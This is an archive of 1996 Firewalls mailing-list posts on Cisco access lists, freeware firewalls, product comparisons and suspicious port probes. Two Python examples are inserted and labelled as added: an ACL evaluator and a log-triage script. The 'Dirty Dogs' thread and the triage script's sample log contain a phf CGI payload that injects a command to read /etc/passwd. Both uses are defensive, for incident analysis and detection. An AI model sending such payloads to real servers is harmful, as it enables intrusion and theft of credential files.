Received: from aurora.cdev.com by relay5.UU.NET with SMTP
Message-Id:
Received: from cdi2p10.cdev.com by aurora.cdev.com id SMTP-00131e5e551018737; Fri, 12 Jul 96 00:40:35 -0500
X-Sender: djs3wn39@aurora.cdev.com
X-Mailer: Windows Eudora Version 1.4.4
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Date: Thu, 11 Jul 1996 21:11:02 -0700
To: jshaw@dttus.com
From: Donald.J.Smith@cdev.com (Donald J Smith)
Cc: FireWalls@GreatCircle.com
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

My mailer believes John said:
>Date: Wed, 10 Jul 96 09:00:00 CST
>From: "John M. Shaw"
>Subject: Newbie Cisco Access-List Question
>
>
>
> Assuming 2 lines with same source, s-mask, dest, and d-mask:
>
> access-list 101 permit tcp source s-mask dest d-mask gt 1023
> access-list 101 deny tcp source s-mask dest d-mask eq 2049
>
> Which one takes precedence?
> Does the order matter?
>
> Any help would be greatly appreciated?

Order matters. Read from top to bottom. First matching rule covers routing
questions. So switch the order and you get a set of rules that denies tcp
eq 2049, but allows all other tcp > 1023.
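To make the first-match rule concrete, here is an added example (not from Donald's post) in Python: a small evaluator for the subset of IOS extended access-list syntax John quoted, with constructed addresses standing in for his "source s-mask dest d-mask" placeholders. It shows the original order letting port 2049 through and the swapped order blocking it, and the implicit deny that ends every list.

```python
from dataclasses import dataclass
from typing import List, Optional

# Destination-port operators in the syntax John used.
PORT_OPS = {
    "eq": lambda p, n: p == n,
    "gt": lambda p, n: p > n,
    "lt": lambda p, n: p < n,
    "neq": lambda p, n: p != n,
}


@dataclass(frozen=True)
class Rule:
    action: str               # "permit" or "deny"
    proto: str                # "tcp", "udp" or "ip"
    src: str
    src_wild: str             # IOS wildcard mask: 1 bits are "don't care"
    dst: str
    dst_wild: str
    op: Optional[str] = None  # operator applied to the destination port
    port: Optional[int] = None


def ip_to_int(addr: str) -> int:
    a, b, c, d = (int(x) for x in addr.split("."))
    return (a << 24) | (b << 16) | (c << 8) | d


def wildcard_match(addr: str, base: str, wild: str) -> bool:
    """IOS semantics: compare only the bits that are 0 in the wildcard."""
    care = ~ip_to_int(wild) & 0xFFFFFFFF
    return (ip_to_int(addr) & care) == (ip_to_int(base) & care)


def parse_rule(line: str) -> Rule:
    """Parse 'access-list N permit|deny PROTO SRC SWILD DST DWILD [OP PORT]'.
    Only the subset in the question is handled: no 'host'/'any' keywords
    and no source-port operators."""
    tok = line.split()
    if tok[0] != "access-list" or tok[2] not in ("permit", "deny"):
        raise ValueError(f"unsupported rule: {line}")
    op, port = (tok[8], int(tok[9])) if len(tok) >= 10 else (None, None)
    return Rule(tok[2], tok[3], tok[4], tok[5], tok[6], tok[7], op, port)


def evaluate(acl: List[Rule], proto: str, src: str, dst: str, dport: int) -> str:
    """Walk the list top to bottom; the first entry that matches decides.
    Falling off the end hits the implicit 'deny any any'."""
    for rule in acl:
        if rule.proto not in (proto, "ip"):
            continue
        if not (wildcard_match(src, rule.src, rule.src_wild)
                and wildcard_match(dst, rule.dst, rule.dst_wild)):
            continue
        if rule.op is not None and not PORT_OPS[rule.op](dport, rule.port):
            continue
        return rule.action
    return "deny"


# Constructed addresses stand in for John's "source s-mask dest d-mask".
ORIGINAL_ORDER = [parse_rule(line) for line in (
    "access-list 101 permit tcp 10.1.0.0 0.0.255.255 192.0.2.0 0.0.0.255 gt 1023",
    "access-list 101 deny tcp 10.1.0.0 0.0.255.255 192.0.2.0 0.0.0.255 eq 2049",
)]
SWAPPED_ORDER = list(reversed(ORIGINAL_ORDER))


def decision(acl: List[Rule], dport: int) -> str:
    """TCP from a host in 10.1/16 to a host in 192.0.2/24 on the given port."""
    return evaluate(acl, "tcp", "10.1.7.25", "192.0.2.10", dport)


if __name__ == "__main__":
    for name, acl in (("original", ORIGINAL_ORDER), ("swapped", SWAPPED_ORDER)):
        print(name, {p: decision(acl, p) for p in (2049, 8080, 80)})
```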
Donald J Smith
Network Security Engineer @Computing Devices International
design in security @ the beginning & ease_of_use != A*(1/Data_Security)
(my opinions are mine and so are the spelling errors ;-)

From firewalls-owner Fri Jul 12 12:19:29 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id MAA05896 for firewalls-outgoing; Fri, 12 Jul 1996 12:05:18 -0700 (PDT)
Received: from gater3.sematech.org (GATER3.SEMATECH.ORG [192.73.53.3]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id MAA05865 for ; Fri, 12 Jul 1996 12:05:07 -0700 (PDT)
Received: from GATEV4.SEMATECH.ORG
Received: from claven.sematech.org (claven.sematech.org)
Received: from webba (webba.eng.sematech.org) by claven.sematech.org with SMTP
Date: Fri, 12 Jul 1996 14:03:21 -0500
From: Andy Webb
Subject: Re: Dirty dogs
To: firewalls@greatcircle.com
Message-id: <31E6A179.2883@swinc.com>
Organization: Simpler-Webb, Inc.
MIME-version: 1.0
X-Mailer: Mozilla 3.0b4Gold (WinNT; I)
Content-type: text/plain; charset=us-ascii
Content-transfer-encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

> Well, folks, whether or not you try to contact genstar.net or zilker.net is
> one issue, but I would definitely do SOMETHING, at least on your own systems.
> Both of these log snippets indicate a SUCCESSFUL use of this attack. Especially
> now that you've published your vulnerability to the world, I hope you're
> disabling the script!
>
> Howard Hantman
> Manager, Technology Integration
> Corporate ITS
> Raytheon Company
>

Actually, zilker.net is Zilker Internet Park - an ISP in Austin, TX. It is
run by John Quarterman and Smoot Carl-Mitchell who would probably be very
happy to provide you with a little chasing and log info.
regards

Andy Webb
awebb@swinc.com

From firewalls-owner Fri Jul 12 12:46:19 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id LAA04187 for firewalls-outgoing; Fri, 12 Jul 1996 11:50:10 -0700 (PDT)
Received: from relay4.UU.NET (relay4.UU.NET [192.48.96.14]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id LAA04139 for ; Fri, 12 Jul 1996 11:49:53 -0700 (PDT)
Received: from hidata.com by relay4.UU.NET with SMTP
Received: by hidata.com; id AA21147; Fri, 12 Jul 96 09:03:29 PDT
Received: from osc.hidata.com(205.158.62.10) by hds-gw.hidata.com via smap (V3.1.1)
Received: from enterprise by osc.osc.hidata.com (SMI-8.6/SMI-SVR4)
Date: Fri, 12 Jul 1996 09:03:25 -0700
Message-Id: <199607121603.JAA04290@osc.osc.hidata.com>
X-Sender: bstout@osc.hidata.com
X-Mailer: Windows Eudora Pro Version 2.1.2
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
To: Firewalls@GreatCircle.COM
From: Bill Stout
Subject: Re: Freeware
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

If you don't know what you're doing with a freeware package, or if the
package has not been updated recently, it is dangerous.

I believe the tis-fwtk is the best freeware firewall package available.
However it has not been updated for years (v1.3), and does not contain
updates to support new versions of platform O.S. For example, the telnet
proxy does not work on all OS's, and just don't use the fwtk httpd, use
CERN's.

Also, not all OS versions are fully supported. If the firewall happens to
compile O.K. on 'SuperUNIX v6.0', you may not be completely sure what the
binaries are going to do when they run. You fix the obvious bugs yourself
by hacking the source code.

That is freeware software. No service, no support, no
'bet-your-company-on-it' ability. In some cases you do have a temperamental
mailing-list to query, but it may take you weeks to get the thing running
exactly right.
Personally I have better things to do with my life than hack a specific
proxy, in a specific software package, for a specific OS, for specific
hardware, which all of course will be obsolete in a few months. (Old:
Gopher/Archie/Veronica, MIP/386/486/VAX CPUs, BSD UNIX. New: Chat,
RealAudio, Encrypted links, new authentication packages,
Solaris/SVR4/FreeBSD/Linux, Java, Active-X, plug-ins, etc.)

If you want something to bet your company on, have a professional install a
commercial supported package. At least if something goes wrong, you have a
place to point to, other than only yourself.

My 2 cents.

Bill Stout

P.S. - An alpha version of Fwtk (v2.0alpha) is available.

At 09:07 AM 7/11/96 -0700, you wrote:
>What are people's experiences with freeware products for firewalling, proxy, etc.? Good, bad, dangerous?
>
>TIA
>
>Joseph Flahiff
>Moss Bay Group, Inc.
>Advisors in Technology Management
>
>
>

<=======10========20========30========40========50========60========70========80
William B. Stout       | Major revelations:
Senior Systems Admin   | "All objects are part of a larger object."
Hitachi Data Systems   | "3 aware beings comprise a person; mind, body, spirit."
NT/UNIX/I-net/Routers  | "The secret of life: To be involved with 'creation'."
408-970-4822           | Infowar, Cyber-war, yes, 'they' are out to get you...
--------------------------------------------------------------------------------

From firewalls-owner Fri Jul 12 13:05:29 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id LAA01376 for firewalls-outgoing; Fri, 12 Jul 1996 11:27:44 -0700 (PDT)
Received: from relay3.UU.NET (relay3.UU.NET [192.48.96.8]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id LAA01308 for ; Fri, 12 Jul 1996 11:27:27 -0700 (PDT)
Received: from phoenix.iss.net by relay3.UU.NET with SMTP
Received: from alexf.iss.net (alexf.iss.net [204.241.60.153]) by phoenix.iss.net (8.6.13/8.6.12) with SMTP id KAA02534 for ; Fri, 12 Jul 1996 10:51:49 -0400
Message-Id: <199607121451.KAA02534@phoenix.iss.net>
Comments: Authenticated sender is
From: "Alex F"
Organization: Internet Security Systems, Inc.
To: firewalls@greatcircle.com
Date: Fri, 12 Jul 1996 10:52:58 +0000
MIME-Version: 1.0
Content-type: text/plain; charset=US-ASCII
Content-transfer-encoding: 7BIT
Subject: binary sniffer
Reply-to: alexf@iss.net
X-mailer: Pegasus Mail for Win32 (v2.32a)
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

I am wondering, are there any sniffers that show packets in binary rather
than hex? I would like to have something akin to Sun's "snoop" where on one
side of the screen I can see the actual packets and on the other side I can
see the ASCII translation. Yes, I can pipe the output to something that
will convert the HEX to binary, but I would just rather have a program that
will show the packets in binary form to start with.
Thanks,

Alex F

=-=-=-=-=-=-=-=-=-=-=-=-=-
Alex F            alexf@iss.net
Marketing Specialist
Internet Security Systems
=-=-=-=-=-=-=-=-=-=-=-=-=-

From firewalls-owner Fri Jul 12 13:05:31 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id LAA02998 for firewalls-outgoing; Fri, 12 Jul 1996 11:41:50 -0700 (PDT)
Received: from relay1.UU.NET (relay1.UU.NET [192.48.96.5]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id LAA02943 for ; Fri, 12 Jul 1996 11:41:31 -0700 (PDT)
Received: from gatekeeper.ray.com by relay1.UU.NET with ESMTP
Received: (mailer@localhost) by gatekeeper.ray.com (8.7.5/8.7.3) id HAA03370; Fri, 12 Jul 1996 07:57:00 -0400
Received: from eoits1.eo.ray.com by gatekeeper.ray.com; Fri Jul 12 07:56:52 1996
Received: by eo.ray.com (5.0/SMI-SVR4)
Date: Fri, 12 Jul 1996 07:56:29 -0400
From: hhantman@eo.ray.com (Howard Hantman)
Message-Id: <9607121156.AA25593@eo.ray.com>
To: bve@omsk.yourtown.com
Subject: Re: Dirty Dogs
Cc: firewalls@GreatCircle.COM
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Since there have been several messages questioning my claim of the reported
attacks being successful, let me clarify.

Yes, the HTTP server will log all requests whether successful or not. BUT,
the last two numbers in the log entry specify the successful or unsuccessful
status of that request and the number of bytes transferred. In the example
quoted below (which failed) the status is in the 400's (failure) and the
bytes transferred is "-" (ie. zero). In the original posts, the requests
had a status of 200 (success) and an actual byte count indicating the size
of the information returned. Those requests did succeed and anyone else who
is seeing these log entries should look at the status condition or better
yet check their cgi-bin directory to see if they have the miscreant utility.
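The status and byte-count fields Howard describes are exactly what a log triage script should key on. The Python below is an added example, not part of Howard's post: it parses Common Log Format lines, flags requests aimed at /cgi-bin/phf, and separates BVE's real 404 line from constructed lines with a 200 and a byte count, the case Howard says did succeed. Brian's point still applies: a 200 settles it, but a 4xx is worth cross-checking against the server's error log.

```python
import re
from collections import Counter
from typing import NamedTuple, Optional

# Common Log Format: host ident authuser [date] "request" status bytes
CLF_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>[^"]*)" (?P<status>\d{3}) (?P<nbytes>-|\d+)$'
)


class Entry(NamedTuple):
    host: str
    time: str
    request: str
    status: int
    nbytes: int      # a "-" in the log means nothing was returned


def parse_clf(line: str) -> Optional[Entry]:
    m = CLF_RE.match(line.rstrip("\n"))
    if m is None:
        return None
    nbytes = 0 if m["nbytes"] == "-" else int(m["nbytes"])
    return Entry(m["host"], m["time"], m["request"], int(m["status"]), nbytes)


def requested_path(request: str) -> str:
    """'GET /cgi-bin/phf?Qalias=... HTTP/1.0' -> '/cgi-bin/phf' (query dropped)."""
    parts = request.split(" ")
    target = parts[1] if len(parts) >= 2 else parts[0]
    return target.split("?", 1)[0]


def is_phf_request(entry: Entry) -> bool:
    # Match on the script path rather than the exact argument string so
    # that variants of the payload are still caught.
    return requested_path(entry.request).lower().endswith("/cgi-bin/phf")


def classify(line: str) -> str:
    """Howard's rule: a 4xx with no bytes is a failed probe; a 200 with a
    real byte count means the script ran and returned output."""
    entry = parse_clf(line)
    if entry is None:
        return "unparsed"
    if not is_phf_request(entry):
        return "other"
    if entry.status == 200 and entry.nbytes > 0:
        return "phf-succeeded"
    return "phf-failed"


def triage(lines) -> Counter:
    """Count categories over an access log; any 'phf-succeeded' hit means
    the host had a live phf script and its cgi-bin needs checking."""
    return Counter(classify(line) for line in lines)


# BVE's real log line from this thread, followed by two constructed lines.
SAMPLE_LOG = [
    '152.169.232.79 - - [03/Jul/1996:17:09:06 -0400] '
    '"GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 404 -',
    # constructed: the same request against a host that still had phf installed
    '192.0.2.44 - - [03/Jul/1996:17:11:52 -0400] '
    '"GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 200 1742',
    # constructed: ordinary traffic
    '192.0.2.9 - - [03/Jul/1996:17:12:03 -0400] "GET /index.html HTTP/1.0" 200 2311',
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(classify(line), "<-", line[:60])
    print(dict(triage(SAMPLE_LOG)))
```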
Howard Hantman
Manager, Technology Integration
Corporate ITS
Raytheon Company

> From: bve@omsk.yourtown.com (BVE)
> To: firewalls@GreatCircle.COM
> Subject: Re: Dirty Dogs
>
>
> from the quill of hhantman@eo.ray.com (Howard Hantman) on scroll
> <9607111219.AA25794@eo.ray.com>
> >> Well, folks, whether or not you try to contact genstar.net or zilker.net
> >> is
> >> one issue, but I would definitely do SOMETHING, at least on your own
> >> systems.
> >> Both of these log snippets indicate a SUCCESSFUL use of this attack.
> >> Especially
> >> now that you've published your vulnerability to the world, I hope you're
> >> disabling the script!
> >
> >From: Brian Murrell
> >
> >Not necessarily. Those look similar to the log files on our server,
> >however if one looks at the corresponding errors file (for the Netscape
> >server) one will notice error messages regarding the access and how the
> >file could not be found.
>
> Brian is correct. The access logs of the WWW servers I've used log all
> attempts, whether or not they are successful. We also were probed:
>
> 152.169.232.79 - - [03/Jul/1996:17:09:06 -0400] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 404 -
>
> This attempt failed, as we did not have a phf CGI script. Interestingly, here
> is the whois:
> > whois -h rs.internic.net 152.169.232.0
> No match for "152.169.232.0".
>
> The InterNIC Registration Services Host contains ONLY Internet Information
> (Networks, ASN's, Domains, and POC's).
> Please use the whois server at nic.ddn.mil for MILNET Information.
>
> ...and:
> > whois 152.169.232.0
> No match for "152.169.232.0".
>
> Please be advised that this whois server only contains DOD Information.
> All INTERNET Domain, IP Network Number, and ASN records are kept in
> the Internet Registry, RS.INTERNIC.NET.
>
> ...and nslookup:
> > nslookup 152.169.232.79
> Server:  omsk.yourtown.com
> Address:  205.246.66.7
>
> Name:    [152.169.232.79]
> Address:  152.169.232.79
>
> -----------------------------
>
> This person seems to have covered their tracks pretty well. Any ideas on
> tracking them??
>
> Bill Van Emburg
> Quadrix Solutions, Inc.
> (bve@quadrix.com)
> (http://yourtown.com)
> "You do what you want, and if you didn't, you don't"
>

From firewalls-owner Fri Jul 12 13:25:26 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id MAA08372 for firewalls-outgoing; Fri, 12 Jul 1996 12:30:04 -0700 (PDT)
Received: from relay4.UU.NET (relay4.UU.NET [192.48.96.14]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id MAA08357 for ; Fri, 12 Jul 1996 12:29:51 -0700 (PDT)
Received: from sic.se by relay4.UU.NET with ESMTP
Received: from pamela.sic.se (pamela.sic.se [194.236.7.44]) by sic.se (8.7.5/8.7.2) with SMTP id OAA00694 for ; Fri, 12 Jul 1996 14:55:29 +0200 (MET DST)
X-Mailer: InterCon tcpCONNECT4 4.0b26 (Macintosh)
MIME-Version: 1.0
Message-Id: <9607121457.AA42616@pamela.sic.se>
Date: Fri, 12 Jul 1996 14:57:42 +0100
From: "Stefan Berg"
To: firewalls@GreatCircle.com
Subject: Re: Freeware
Content-Type: Text/Plain; charset=US-ASCII
Content-Disposition: Inline
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

My experience with freeware or any other firewall software for that matter
is that it very much depends on _configuration_ rather than the quality of
the software. I mean, what's the use of a
super_duper_mega_expensive_and_great firewall if you don't know how to set
it up in a secure fashion?

I think one key to successful firewalling is good planning combined with
organization and policy.
/Stefan
--
_______________________________________________________
Stefan Berg
ISDN Group of Sweden / Svenska InternetCentralen
Phone: +46-8-667 7010    Fax: +46-8-667 0610
E-mail: stefan@sic.se
WWW: http://www.isdn.se/  http://www.sic.se/
_______________________________________________________
Recursive; adj. see Recursive

From firewalls-owner Fri Jul 12 13:33:20 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id MAA08359 for firewalls-outgoing; Fri, 12 Jul 1996 12:29:54 -0700 (PDT)
Received: from relay4.UU.NET (relay4.UU.NET [192.48.96.14]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id MAA08343 for ; Fri, 12 Jul 1996 12:29:46 -0700 (PDT)
Received: from mail.rc.toronto.on.ca by relay4.UU.NET with SMTP
Received: by mail.rc.toronto.on.ca with SMTP (Microsoft Exchange Server Internet Mail Connector Version 4.0.979.0)
Message-ID:
From: Russ
To: "'Matthew Keenan'"
Cc: "'Firewalls'"
Subject: RE: Dirty Dogs
Date: Fri, 12 Jul 1996 08:48:20 -0400
X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.0.979.0
MIME-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Anyone got any ideas as to how we can make AOL more responsive to the security issues their users create? You don't see these types of problems originating from Compuserve. I realize that hackers could go to other resources, but the simple fact is that AOL generates more email bombers, faked email, and probing hackers than any other single source, and their abuse@aol.com address is next to useless. I've sent messages as Postmaster@, which should be treated with a modicum of respect, and received nothing more than an auto-reply, never, ever, a single personal response. Netcom is not much better.

AOL has to become more responsive to the security issues they are creating through their marketing.
Giving away free access may get them more customers, but it's done at the expense of the rest of the Internet.

And for those wondering what to do with sites that are run by hackers, the easiest thing is to contact their ISP. If you contact a site and don't get a response, or don't get a satisfactory response, then move up the traceroute.

Cheers,
Russ

From firewalls-owner Fri Jul 12 13:35:25 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id LAA04202 for firewalls-outgoing; Fri, 12 Jul 1996 11:50:29 -0700 (PDT)
Received: from relay4.UU.NET (relay4.UU.NET [192.48.96.14]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id LAA04188 for ; Fri, 12 Jul 1996 11:50:12 -0700 (PDT)
Received: from hidata.com by relay4.UU.NET with SMTP
Received: by hidata.com; id AA21213; Fri, 12 Jul 96 09:08:59 PDT
Received: from osc.hidata.com(205.158.62.10) by hds-gw.hidata.com via smap (V3.1.1)
Received: from enterprise by osc.osc.hidata.com (SMI-8.6/SMI-SVR4)
Date: Fri, 12 Jul 1996 09:08:56 -0700
Message-Id: <199607121608.JAA04305@osc.osc.hidata.com>
X-Sender: bstout@osc.hidata.com
X-Mailer: Windows Eudora Pro Version 2.1.2
Mime-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
To: Firewalls@GreatCircle.COM
From: Bill Stout
Subject: Re: Sidewinder Versus EagleRaptor
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

I compared Eagle NT features with Gauntlet (I know, not fair) and compiling a list of the proxies turned out to be educational.
Eagle NT 3.0                   Gauntlet 3.1
· Transparent Telnet           · Transparent Telnet
· Authenticated Telnet         · Authenticated Telnet
· Transparent Http             · Transparent Http
· Proxied Http                 · Proxied Http
· Proxied Gopher               · Proxied Gopher
· Transparent FTP              · Transparent FTP
· Authenticated FTP            · Authenticated FTP
· Transparent SMTP             · SMAP/Sendmail (No sendmail/mail relay capabilities)
                               · rlogin
                               · rsh
                               · X-11
                               · Finger
                               · Printer
                               · POP3
                               · Administrative GUI (info-gw)

Non-proxied service for NNTP, Whois, Real Audio, quotd, (unauthenticated, directionally savvy port 'service(s)'):
· Proxyd                       · plug-gw

Eagle also includes 'Generic pass-through', an unauthenticated, directionally clueless open port 'service'. Must be the only 'real way' to punch a hole in your firewall.

Authentication methods supported:

Eagle NT                       Gauntlet
· S/Key                        · S/Key
· Password list                · Enigma Logistics devices
                               · SecureID (Security Dynamics)
                               · SecurNet (Digital Pathways)
                               · CryptoCard
                               · DigiPass

A more fair comparison would be with the Eagle Raptor UNIX vs. Gauntlet.

Feel free to correct my list!

Bill Stout

At 01:43 PM 7/10/96 MDT, you wrote:
>My organization is finally coming close to making a decision on a firewall
>product. My question is this: is there anyone in this group who has
>evaluated both Sidewinder and EagleRaptor within the past year and has:
>
>1) selected EagleRaptor but now wishes they had gone with Sidewinder
>
>2) selected Sidewinder but now wishes they had gone with EagleRaptor
>
>3) selected EagleRaptor for NT and is experiencing difficulties or is elated
>
>You can respond privately to me at jbarnett@micron.net, please. Since this is
>the first time I have tried to post anything to this group (I just joined
>today), please forgive me if I somehow stepped on any rules for posting.
>Thanks!
>jon
>
>#########################################################
>Jon Barnett    jbarnett@micron.net
>               (208) 384-7018
>"Colorful ideas are a pigment of your own imagination"
>#########################################################
>
>

<=======10========20========30========40========50========60========70========80
William B. Stout      | Major revelations:
Senior Systems Admin  | "All objects are part of a larger object."
Hitachi Data Systems  | "3 aware beings comprise a person; mind, body, spirit."
NT/UNIX/I-net/Routers | "The secret of life: To be involved with 'creation'."
408-970-4822          | Infowar, Cyber-war, yes, 'they' are out to get you...
--------------------------------------------------------------------------------

From firewalls-owner Fri Jul 12 13:47:50 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id MAA08497 for firewalls-outgoing; Fri, 12 Jul 1996 12:31:04 -0700 (PDT)
Received: from relay2.UU.NET (relay2.UU.NET [192.48.96.7]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id MAA08410 for ; Fri, 12 Jul 1996 12:30:37 -0700 (PDT)
Received: from apu.connectix.com by relay2.UU.NET with ESMTP
Received: from [204.118.199.198] (snowball.connectix.com [204.118.199.198]) by apu.connectix.com (8.7.5/8.6.9) with SMTP id IAA03298 for ; Fri, 12 Jul 1996 08:41:35 -0700
Date: Fri, 12 Jul 1996 08:41:35 -0700
Message-Id: <199607121541.IAA03298@apu.connectix.com>
Subject: POP exploits
From: Rob Sansom
To:
Mime-Version: 1.0
Content-Type: text/plain; charset="US-ASCII"
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

I occasionally get a burst of TCP packets to port 110 on our web server, which does not run a POP3 server or any such thing.
Here's a good example:

Jul 11 20:23:20 gate247159.connectix.com 8774: %SEC-6-IPACCESSLOGP: list 120 denied tcp 206.129.83.142(1558) -> 204.247.159.244(110), 1 packet
Jul 11 20:29:09 gate247159.connectix.com 8775: %SEC-6-IPACCESSLOGP: list 120 denied tcp 206.129.83.142(1558) -> 204.247.159.244(110), 117 packets
Jul 11 20:33:29 gate247159.connectix.com 8776: %SEC-6-IPACCESSLOGP: list 120 denied tcp 206.129.83.142(1766) -> 204.247.159.244(110), 1 packet
Jul 11 20:34:09 gate247159.connectix.com 8777: %SEC-6-IPACCESSLOGP: list 120 denied tcp 206.129.83.142(1558) -> 204.247.159.244(110), 89 packets
Jul 11 20:39:09 gate247159.connectix.com 8778: %SEC-6-IPACCESSLOGP: list 120 denied tcp 206.129.83.142(1766) -> 204.247.159.244(110), 136 packets
Jul 11 20:43:35 gate247159.connectix.com 8779: %SEC-6-IPACCESSLOGP: list 120 denied tcp 206.129.83.142(1337) -> 204.247.159.244(110), 1 packet
Jul 11 20:45:09 gate247159.connectix.com 8780: %SEC-6-IPACCESSLOGP: list 120 denied tcp 206.129.83.142(1766) -> 204.247.159.244(110), 120 packets
Jul 11 20:49:09 gate247159.connectix.com 8781: %SEC-6-IPACCESSLOGP: list 120 denied tcp 206.129.83.142(1337) -> 204.247.159.244(110), 271 packets
Jul 11 20:53:34 gate247159.connectix.com 8782: %SEC-6-IPACCESSLOGP: list 120 denied tcp 206.129.83.142(1679) -> 204.247.159.244(110), 1 packet
Jul 11 20:54:09 gate247159.connectix.com 8783: %SEC-6-IPACCESSLOGP: list 120 denied tcp 206.129.83.142(1337) -> 204.247.159.244(110), 195 packets
Jul 11 20:56:08 gate247159.connectix.com 8784: %SEC-6-IPACCESSLOGP: list 120

I know it's not an employee trying to collect their mail, since all of these connection attempts have come from places like Malaysia, Washington State (above - ixa.net), and other such places where they have no business being. Also, they know that our POP server is not accessible from outside.

This leads me to believe that the above log entries are attacks, and I'm puzzled as to what they may be trying to attempt.
The web server is our most visible machine, so I guess that's why they are targeting it.

Any Ideas??

Thanks in advance,

Rob Sansom
Network Admin.
Connectix Corp
(415) 638-7398
sansom@connectix.com

From firewalls-owner Fri Jul 12 14:10:47 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id MAA09103 for firewalls-outgoing; Fri, 12 Jul 1996 12:35:06 -0700 (PDT)
Received: from relay6.UU.NET (relay6.UU.NET [192.48.96.16]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id MAA09063 for ; Fri, 12 Jul 1996 12:34:46 -0700 (PDT)
Received: from mailbox.neosoft.com by relay6.UU.NET with ESMTP
Received: from fw.nmti.com (fw.baileynm.com [206.109.159.11]) by mailbox.neosoft.com (8.7.5/8.7.3) with SMTP id KAA03506; Fri, 12 Jul 1996 10:10:01 -0500 (CDT)
Received: from web.nmti.com(198.178.0.201) by fw.nmti.com via smap (V1.3)
Received: from sonic.nmti.com (peter@sonic.nmti.com [198.178.0.2]) by web.nmti.com (8.6.12/8.6.9) with SMTP id KAA00141; Fri, 12 Jul 1996 10:02:34 -0500
Received: by sonic.nmti.com; id AA01386; Fri, 12 Jul 1996 10:02:33 -0500
From: peter@baileynm.com (Peter da Silva)
Message-Id: <9607121502.AA01386@sonic.nmti.com.nmti.com>
Subject: Re: CISCO network level encryption & key lengths
To: ckostick@ashton.csc.com (Chris Kostick)
Date: Fri, 12 Jul 1996 10:02:33 -0500 (CDT)
Cc: adam@homeport.org, firewalls@GreatCircle.COM
In-Reply-To: <199607120149.VAA17727@mccoy.ashton.csc.com> from "Chris Kostick" at Jul 11, 96 09:49:31 pm
X-Mailer: ELM [version 2.4 PL23]
Content-Type: text
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

> This is kind of the point I'm driving at. Any bad guy won't do this. The
> bad guys in question here aren't trying to look at love letters. They want
> to steal some serious information if they're going to the trouble of
> attacking an encryption code. Therefore, I don't think the bad guys would
> risk using other peoples machines to do this.

You underestimate loonies.
Dimitri Vulis forged hundreds of obscene solicitations in the name of one of Jan Isley's associates to get Jan kicked off Emory University's system. If someone crazy enough decides you're interesting, cracking a lab full of workstations is nothing. That's way less obtrusive than what Vulis did.

You're also forgetting the massive growth in computer power. "A lab full of machines" will be "one hot system" in five years, and "everyone's kid's videogame console" in ten. So if you have a secret that's not going to be worth anything in five years be my guest and use a 40 bit cypher.

From firewalls-owner Fri Jul 12 14:14:37 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id MAA12078 for firewalls-outgoing; Fri, 12 Jul 1996 12:53:36 -0700 (PDT)
Received: from relay3.UU.NET (relay3.UU.NET [192.48.96.8]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id MAA11995 for ; Fri, 12 Jul 1996 12:53:08 -0700 (PDT)
Received: from giascl01.vsnl.net.in by relay3.UU.NET with SMTP
Received: by giascl01.vsnl.net.in; (5.65v3.2/1.1.8.2/27Apr96-1140PM)
Date: Fri, 12 Jul 1996 22:50:36 +0500 (GMT+0500)
From: Kaustubh Kundu
To: firewalls@greatcircle.com
Subject: A little off topic - BIOS details for security
Message-Id:
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Hi Folks,

I am trying to compile the details of different BIOS-s which support the change of Boot Sequence i.e. change over to C: A: instead of normal A: C:. Most of the present day's BIOS support this but unfortunately there is no standard of how you access the screen to change this parameter. Can anybody lead me to any pointer(s) or some reference so that I can compile these details?
Thanks in advance,
KK

From firewalls-owner Fri Jul 12 14:47:27 1996
